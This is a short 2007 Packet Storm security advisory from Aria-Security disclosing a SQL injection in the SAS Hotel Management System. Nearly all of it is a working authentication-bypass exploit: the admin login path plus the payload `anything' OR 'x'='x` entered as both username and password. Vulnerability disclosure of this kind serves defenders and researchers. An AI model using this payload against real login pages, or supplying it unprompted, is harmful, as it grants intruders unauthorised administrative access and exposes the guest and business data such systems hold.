sashotel-sql.txt

2007-08-10T00:00:00
ID PACKETSTORM:58412
Type packetstorm
Reporter aria-security.net
Modified 2007-08-10T00:00:00

Description

                                        
                                            `__________________________  
  
A R I A - S E CU R I T Y   
___________________________  
  
SAS Hotel Management System SQL Injection  
http://www.sellatsite.com/sellatsite/hotel.asp  
  
  
Explanation:  
  
http://path/admin/admin.asp  
  
Username: anything' OR 'x'='x  
password: anything' OR 'x'='x  
  
  
  
Credits: Aria-Security Team  
http://aria-security.net  
http://outlaw.Aria-Security.net/ [PERSONAL BLOG]  
`